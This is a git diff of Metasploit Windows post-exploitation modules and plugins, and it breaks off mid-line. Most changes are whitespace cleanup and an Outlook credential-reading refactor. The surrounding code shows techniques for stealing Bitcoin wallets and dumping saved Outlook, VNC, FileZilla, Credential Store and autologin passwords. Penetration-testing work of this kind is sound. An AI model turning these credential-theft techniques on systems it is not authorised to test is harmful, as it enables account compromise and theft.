b/modules/post/windows/gather/bitcoin_jacker.rb old mode 100755 new mode 100644 index e5c4792b78..af1ea56f91 --- a/modules/post/windows/gather/bitcoin_jacker.rb +++ b/modules/post/windows/gather/bitcoin_jacker.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post wallet = session.fs.file.new(filename, "rb") until wallet.eof? data << wallet.read - end + end store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet") print_status(" Wallet Jacked.") diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index ffe83ad3f9..3aad4255e3 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -328,7 +328,7 @@ class Metasploit3 < Msf::Post hash.unpack("H*")[0], logonDomainName, dnsDomainName, - last.strftime("%F %T"), + last.strftime("%F %T"), upn, effectiveName, fullName, diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb index 5d64667166..f94a26c641 100644 --- a/modules/post/windows/gather/credentials/enum_cred_store.rb +++ b/modules/post/windows/gather/credentials/enum_cred_store.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate the Microsoft Credential Store and decrypt the credentials. This module can only access credentials created by the user the - process is running as. It cannot decrypt Domain Network Passwords, but will + process is running as. It cannot decrypt Domain Network Passwords, but will display the username and location. }, 'License' => MSF_LICENSE, @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post end return str_data || "Error Decrypting" end - + def decrypt_blob(daddr, dlen, type) #type 0 = passport cred, type 1 = wininet cred #set up entropy @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Post def gethost(hostorip) #check for valid ip and return if it is - return hostorip if Rex::Socket.dotted_ip?(hostorip) + return hostorip if Rex::Socket.dotted_ip?(hostorip) #convert hostname to ip and return it hostip = nil @@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post ip_add= gethost(host) - unless ip_add.nil? + unless ip_add.nil? auth = { :host => ip_add, :port => port, @@ -185,10 +185,10 @@ class Metasploit3 < Msf::Post #call credenumerate to get the ptr needed adv32 = session.railgun.advapi32 ret = adv32.CredEnumerateA(nil,0,4,4) - p_to_arr = ret["Credentials"].unpack("V") + p_to_arr = ret["Credentials"].unpack("V") arr_len = ret["Count"] * 4 if is_86 arr_len = ret["Count"] * 8 unless is_86 - + #tell user what's going on print_status("#{ret["Count"]} credentials found in the Credential Store") if ret["Count"] > 0 diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 81dba96cea..c4ca4059b5 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -140,8 +140,10 @@ class Metasploit3 < Msf::Post end file.close - creds, perms, config = parse_server(fs_xml) # user credentials password is just an MD5 hash - # admin pass is just plain text. Priorities? + # user credentials password is just an MD5 hash + # admin pass is just plain text. Priorities? + creds, perms, config = parse_server(fs_xml) + creds.each do |cred| credentials << [cred['host'], cred['port'], cred['user'], cred['password'], cred['ssl']] diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index cf5202c019..d9d1f99c61 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -82,21 +82,27 @@ class Metasploit3 < Msf::Post return decrypted_pw end + # Just a wrapper to avoid copy pasta and long lines + def get_valdata(k, name) + key_base = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" + registry_getvaldata("#{key_base}\\#{k}", name) + end def get_registry #Determine if saved accounts exist within Outlook. Ignore the Address Book and Personal Folder registry entries. outlook_exists = 0 saved_accounts = 0 - next_account_id = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", 'NextAccountID') + + next_account_id = get_valdata("", 'NextAccountID') if next_account_id != nil #Microsoft Outlook not found print_status "Microsoft Outlook found in Registry..." outlook_exists = 1 - registry_enumkeys("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\").each do |k| - display_name = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Display Name') + registry_enumkeys(key_base + "9375CFF0413111d3B88A00104B2A6676\\").each do |k| + display_name = get_valdata(k, 'Display Name') if display_name == nil #Microsoft Outlook found, but no account data saved in this location @@ -106,17 +112,17 @@ class Metasploit3 < Msf::Post #Account found - parse through registry data to determine account type. Parse remaining registry data after to speed up module. saved_accounts = 1 got_user_pw = 0 - accountname = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Account Name') - displayname = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Display Name') - email = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Email') - pop3_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Server') - smtp_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Server') - http_server_url = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Server URL') - imap_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Server') - smtp_use_auth = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use Auth') + accountname = get_valdata(k, 'Account Name') + displayname = get_valdata(k, 'Display Name') + email = get_valdata(k, 'Email') + pop3_server = get_valdata(k, 'POP3 Server') + smtp_server = get_valdata(k, 'SMTP Server') + http_server_url = get_valdata(k, 'HTTP Server URL') + imap_server = get_valdata(k, 'IMAP Server') + smtp_use_auth = get_valdata(k, 'SMTP Use Auth') if smtp_use_auth != nil - smtp_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP User') - smtp_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Password') + smtp_user = get_valdata(k, 'SMTP User') + smtp_password = get_valdata(k, 'SMTP Password') end if pop3_server != nil @@ -136,10 +142,10 @@ class Metasploit3 < Msf::Post print_status(" User E-mail Address: #{email}") if type == "POP3" - pop3_pw = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Password') - pop3_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 User') - pop3_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Use SPA') - smtp_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Port') + pop3_pw = get_valdata(k, 'POP3 Password') + pop3_user = get_valdata(k, 'POP3 User') + pop3_use_spa = get_valdata(k, 'POP3 Use SPA') + smtp_port = get_valdata(k, 'SMTP Port') print_status(" User Name: #{pop3_user}") if pop3_pw == nil @@ -160,14 +166,14 @@ class Metasploit3 < Msf::Post print_status(" Incoming Mail Server (POP3): #{pop3_server}") - pop3_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Use SSL') + pop3_use_ssl = get_valdata(k, 'POP3 Use SSL') if pop3_use_ssl == nil print_status(" POP3 Use SSL: No") else print_status(" POP3 Use SSL: Yes") end - pop3_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Port') + pop3_port = get_valdata(k, 'POP3 Port') if pop3_port == nil print_status(" POP3 Port: 110") portnum = 110 @@ -186,7 +192,7 @@ class Metasploit3 < Msf::Post print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}") end - smtp_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use SSL') + smtp_use_ssl = get_valdata(k, 'SMTP Use SSL') if smtp_use_ssl == nil print_status(" SMTP Use SSL: No") else @@ -201,9 +207,9 @@ class Metasploit3 < Msf::Post end elsif type == "HTTP" - http_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Password') - http_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP User') - http_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Use SPA') + http_password = get_valdata(k, 'HTTP Password') + http_user = get_valdata(k, 'HTTP User') + http_use_spa = get_valdata(k, 'HTTP Use SPA') print_status(" User Name: #{http_user}") if http_password == nil @@ -232,10 +238,10 @@ class Metasploit3 < Msf::Post print_status(" HTTP Server URL: #{http_server_url}") elsif type == "IMAP" - imap_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP User') - imap_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Use SPA') - imap_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Password') - smtp_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Port') + imap_user = get_valdata(k, 'IMAP User') + imap_use_spa = get_valdata(k, 'IMAP Use SPA') + imap_password = get_valdata(k, 'IMAP Password') + smtp_port = get_valdata(k, 'SMTP Port') print_status(" User Name: #{imap_user}") if imap_password == nil @@ -255,14 +261,14 @@ class Metasploit3 < Msf::Post print_status(" Incoming Mail Server (IMAP): #{imap_server}") - imap_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Use SSL') + imap_use_ssl = get_valdata(k, 'IMAP Use SSL') if imap_use_ssl == nil print_status(" IMAP Use SSL: No") else print_status(" IMAP Use SSL: Yes") end - imap_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Port') + imap_port = get_valdata(k, 'IMAP Port') if imap_port == nil print_status(" IMAP Port: 143") portnum = 143 @@ -281,7 +287,7 @@ class Metasploit3 < Msf::Post print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}") end - smtp_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use SSL') + smtp_use_ssl = get_valdata(k, 'SMTP Use SSL') if smtp_use_ssl == nil print_status(" SMTP Use SSL: No") else diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index c63a83422b..b5781a85ac 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -86,20 +86,20 @@ class Metasploit3 < Msf::Post def run - ''' - Hash format - :name, - :check_file, - :check_reg, - :pass_variable, - :port_variable, - :port, - :hash, - :pass, - :viewonly_variable, - :viewonly_hash, - :viewonly_pass - ''' + ''' + Hash format + :name, + :check_file, + :check_reg, + :pass_variable, + :port_variable, + :port, + :hash, + :pass, + :viewonly_variable, + :viewonly_hash, + :viewonly_pass + ''' locations = [] diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index 60c3db0ead..cca0dd5480 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -53,14 +53,13 @@ class Metasploit3 < Msf::Post creds = Rex::Ui::Text::Table.new( 'Header' => 'Windows AutoLogin Password', 'Ident' => 1, - 'Columns' => - [ + 'Columns' => [ 'Domain', 'UserName', 'Password' ] ) - + has_al = 0 # DefaultDomainName, DefaultUserName, DefaultPassword diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb index 9900cd26e5..54dde5f77c 100644 --- a/modules/post/windows/gather/dumplinks.rb +++ b/modules/post/windows/gather/dumplinks.rb @@ -157,8 +157,8 @@ class Metasploit3 < Msf::Post lvt['name'] = lnk_file.sysread(lvt['len'] - 0x10) @data_out += "\t\tVolume Name = #{lvt['name']}\n" + - "\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" + - "\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n" + "\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" + + "\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n" end diff --git a/modules/post/windows/gather/enum_dirperms.rb b/modules/post/windows/gather/enum_dirperms.rb index d0bc9ad801..2e853635fa 100644 --- a/modules/post/windows/gather/enum_dirperms.rb +++ b/modules/post/windows/gather/enum_dirperms.rb @@ -46,11 +46,11 @@ class Metasploit3 < Msf::Post #p = kern.GetCurrentProcess() #get handle to current process pid = session.sys.process.open.pid pr = session.sys.process.open(pid, PROCESS_ALL_ACCESS) - pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token + pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token it = adv.DuplicateToken(pt["TokenHandle"],2, 4) # get an impersonation token if it["return"] #if it fails return 0 for error handling return it["DuplicateTokenHandle"] - else + else return 0 end end @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Post gen_map = [0,0,0,0] gen_map = gen_map.pack("L") - #get Security Descriptor for the directory + #get Security Descriptor for the directory f = adv.GetFileSecurityA(dir, si, 20, 20, 4) f = adv.GetFileSecurityA(dir, si, f["lpnLengthNeeded"], f["lpnLengthNeeded"], 4) sd = f["pSecurityDescriptor"] @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Post next if d =~ /^(\.|\.\.)$/ realpath = dpath + '\\' + d if session.fs.file.stat(realpath).directory? - perm = check_dir(realpath, token) + perm = check_dir(realpath, token) if !filter or perm.include? filter print_status(perm + "\t" + realpath) end @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Post #get impersonation token print_status("Getting impersonation token...") t = get_imperstoken() - + #loop through sub dirs if we have an impers token..else error if t == 0 print_error("Getting impersonation token failed") diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb index 3074efeeae..40aac09849 100644 --- a/modules/post/windows/gather/enum_ms_product_keys.rb +++ b/modules/post/windows/gather/enum_ms_product_keys.rb @@ -41,23 +41,24 @@ class Metasploit3 < Msf::Post "License Key" ]) - keys = [["HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77654"], - ["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574"], - ["HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId"], - ] + keys = [ + [ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77654" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId" ], + ] keys.each do |keyx86| - + #parent key p = keyx86[0,1].join - + #child key c = keyx86[1,1].join @@ -122,7 +123,7 @@ class Metasploit3 < Msf::Post (string_length-1).downto(0) do |s| t = ((mindex << 8) & 0xffffffff) | product_id[s] - product_id[s] = t / 24 + product_id[s] = t / 24 mindex = t % 24 end diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index 997256a854..d1483e041e 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -17,20 +17,19 @@ class Metasploit3 < Msf::Post super( update_info(info, 'Name' => 'Windows Gather Process Memory Grep', 'Description' => %q{ - This module allows for searching the memory space of a proccess for potentially sensitive - data. - }, + This module allows for searching the memory space of a proccess for potentially sensitive + data. + }, 'License' => MSF_LICENSE, 'Author' => ['bannedit'], 'Version' => '$Revision$', 'Platform' => ['windows'], 'SessionTypes' => ['meterpreter' ] )) - register_options( - [ - OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]), - OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]), - ], self.class) + register_options([ + OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]), + OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]), + ], self.class) end def run diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index ce87662f21..c03925e4f6 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, 'Name' => "Windows Gather IP Range Reverse Lookup", - 'Description' => %q{ + 'Description' => %q{ This module uses Railgun, calling the gethostbyaddr function to resolve a hostname to an IP. }, @@ -34,12 +34,12 @@ class Metasploit3 < Msf::Post ], self.class) end - + def run - - #Add ws2_32 just in case it isn't there... + + #Add ws2_32 just in case it isn't there... session.railgun.ws2_32 - + #Check if gethostbyaddr is available to us modhandle = session.railgun.kernel32.GetModuleHandleA('ws2_32.dll') if modhandle['return'] == 0 @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Post return end end - + #Initialize Railgun 'gethostbyaddr' call' session.railgun.add_function('ws2_32', 'gethostbyaddr', 'DWORD', [ ['PCHAR', 'addr', 'in'], @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Post iplist.each do |x| #Converts an IP in string formate to network byte order format nbi = Rex::Socket.addr_aton(x) - + #Call gethostbyaddr result = session.railgun.ws2_32.gethostbyaddr(nbi.to_s,nbi.size,2) if result['return'] == 0 diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb index 957f608bd6..7399852c33 100644 --- a/modules/post/windows/gather/usb_history.rb +++ b/modules/post/windows/gather/usb_history.rb @@ -85,10 +85,10 @@ class Metasploit3 < Msf::Post if isadmin mace = registry_getkeylastwritetime('HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceClasses\\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\' << guid) if mace - keytime = ::Time.at(mace) - else - keytime = "Unknown" - end + keytime = ::Time.at(mace) + else + keytime = "Unknown" + end out << sprintf("%25s\t%50s\n", "Volume lpftLastWriteTime", keytime) end print_status(info_hash_to_str(out, v)) diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index e8d1f2dc55..f25657310a 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -101,14 +101,12 @@ class Metasploit3 < Msf::Post 'Header' => "Active Routing Table", 'Prefix' => "\n", 'Postfix' => "\n", - 'Columns' => - [ + 'Columns' => [ 'Subnet', 'Netmask', 'Gateway', ], - 'ColProps' => - { + 'ColProps' => { 'Subnet' => { 'MaxWidth' => 17 }, 'Netmask' => { 'MaxWidth' => 17 }, }) diff --git a/modules/post/windows/manage/delete_user.rb b/modules/post/windows/manage/delete_user.rb index b357d59f0d..8df6b6bb1d 100644 --- a/modules/post/windows/manage/delete_user.rb +++ b/modules/post/windows/manage/delete_user.rb @@ -19,8 +19,10 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Local User Account Deletion', - 'Description' => %q{ This module deletes a local user account from the specified server, - or the local machine if no server is given.}, + 'Description' => %q{ + This module deletes a local user account from the specified server, + or the local machine if no server is given. + }, 'License' => MSF_LICENSE, 'Author' => [ 'chao-mu'], 'Version' => '$Revision$', diff --git a/plugins/db_credcollect.rb b/plugins/db_credcollect.rb index fdff784218..6c23c5e613 100644 --- a/plugins/db_credcollect.rb +++ b/plugins/db_credcollect.rb @@ -57,8 +57,8 @@ class Plugin::CredCollect < Msf::Plugin # Target infos for the db record addr = session.sock.peerhost # This ought to read from the exploit's datastore. - # Use the meterpreter script if you need to control it. - smb_port = 445 + # Use the meterpreter script if you need to control it. + smb_port = 445 # Record hashes to the running db instance hashes.each do |hash| diff --git a/plugins/ips_filter.rb b/plugins/ips_filter.rb index 7b4035bd46..5efa06e46c 100644 --- a/plugins/ips_filter.rb +++ b/plugins/ips_filter.rb @@ -68,7 +68,7 @@ module SocketTracer # Hook the write method def write(buf, opts = {}) if (ips_match(buf)) - $stderr.puts "*** Outbound write blocked due to possible signature match" + print_error "Outbound write blocked due to possible signature match" return 0 end super(buf, opts) @@ -78,7 +78,7 @@ module SocketTracer def read(length = nil, opts = {}) r = super(length, opts) if (ips_match(r)) - $stderr.puts "*** Incoming read may match a known signature" + print_error "Incoming read may match a known signature" end return r end @@ -95,11 +95,11 @@ module SocketTracer begin r = Regexp.new(s[1]) if (data.match(r)) - $stderr.puts "*** Matched IPS signature #{s[0]}" + print_error "Matched IPS signature #{s[0]}" return true end rescue ::Exception => e - $stderr.puts "*** Compiled error: #{s[1]}" + print_error "Compiled error: #{s[1]}" end end diff --git a/plugins/lab.rb b/plugins/lab.rb index 6c5054ed7d..60e3f8b7ed 100644 --- a/plugins/lab.rb +++ b/plugins/lab.rb @@ -1,5 +1,6 @@ ## -## $Id$ +# $Id$ +# $Revision$ ## $:.unshift(File.join(File.expand_path(File.dirname(__FILE__)), '..', 'lib', 'lab')) @@ -14,7 +15,7 @@ class Plugin::Lab < Msf::Plugin include Msf::Ui::Console::CommandDispatcher attr_accessor :controller - + def initialize(driver) super(driver) @controller = nil @@ -28,12 +29,12 @@ class Plugin::Lab < Msf::Plugin "lab_help" => "lab_help - Show that command's description.", "lab_show" => "lab_show - show all vms in the lab.", "lab_show_running" => "lab_show_running - show running vms.", - "lab_load" => "lab_load [file] - load a lab definition from disk.", + "lab_load" => "lab_load [file] - load a lab definition from disk.", "lab_save" => "lab_save [filename] - persist a lab definition in a file.", - "lab_load_running" => "lab_load_running [type] [user] [host] - use the running vms to create a lab.", - "lab_load_config" => "lab_load_config [type] [user] [host] - use the vms in the config to create a lab.", + "lab_load_running" => "lab_load_running [type] [user] [host] - use the running vms to create a lab.", + "lab_load_config" => "lab_load_config [type] [user] [host] - use the vms in the config to create a lab.", "lab_load_dir" => "lab_load_dir [type] [directory] - create a lab from a specified directory.", - "lab_clear" => "lab_clear - clear the running lab.", + "lab_clear" => "lab_clear - clear the running lab.", "lab_start" => "lab_start [vmid+|all] start the specified vm.", "lab_reset" => "lab_reset [vmid+|all] reset the specified vm.", "lab_suspend" => "lab_suspend [vmid+|all] suspend the specified vm.", @@ -48,60 +49,60 @@ class Plugin::Lab < Msf::Plugin def name "Lab" end - + ## ## Regular Lab Commands - ## + ## def cmd_lab_load(*args) - return lab_usage unless args.count == 1 + return lab_usage unless args.count == 1 @controller.from_file(args[0]) end def cmd_lab_load_running(*args) return lab_usage if args.empty? - + if args[0] =~ /^remote_/ - return lab_usage unless args.count == 3 + return lab_usage unless args.count == 3 ## Expect a username & password @controller.build_from_running(args[0], args[1], args[2]) else - return lab_usage unless args.count == 1 + return lab_usage unless args.count == 1 @controller.build_from_running(args[0]) end end def cmd_lab_load_config(*args) return lab_usage if args.empty? - + if args[0] =~ /^remote_/ - return lab_usage unless args.count == 3 + return lab_usage unless args.count == 3 ## Expect a username & password @controller.build_from_config(args[0], args[1], args[2]) else - return lab_usage unless args.count == 1 + return lab_usage unless args.count == 1 @controller.build_from_config(args[0]) end end - def cmd_lab_load_dir(*args) + def cmd_lab_load_dir(*args) return lab_usage unless args.count == 2 @controller.build_from_dir(args[0],args[1],true) end def cmd_lab_clear(*args) @controller.clear! - end + end - def cmd_lab_save(*args) + def cmd_lab_save(*args) return lab_usage if args.empty? @controller.to_file(args[0]) end - - ## + + ## ## Commands for dealing with a currently-loaded lab - ## + ## def cmd_lab_show(*args) if args.empty? @@ -112,72 +113,72 @@ class Plugin::Lab < Msf::Plugin print_line @controller[vmid].to_yaml else print_error "Unknown vm '#{vmid}'" - end - end - end - end - - def cmd_lab_show_running(*args) - hlp_print_lab_running - end - - def cmd_lab_start(*args) - return lab_usage if args.empty? - - if args[0] == "all" - @controller.each do |vm| - print_line "Starting lab vm #{vm.vmid}." - if !vm.running? - vm.start - else - print_line "Lab vm #{vm.vmid} already running." end end - else - args.each do |arg| - if @controller.includes_vmid? arg - vm = @controller.find_by_vmid(arg) - if !vm.running? - print_line "Starting lab vm #{vm.vmid}." - vm.start - else - print_line "Lab vm #{vm.vmid} already running." - end - end - end end end - - def cmd_lab_stop(*args) + + def cmd_lab_show_running(*args) + hlp_print_lab_running + end + + def cmd_lab_start(*args) return lab_usage if args.empty? - + if args[0] == "all" - @controller.each do 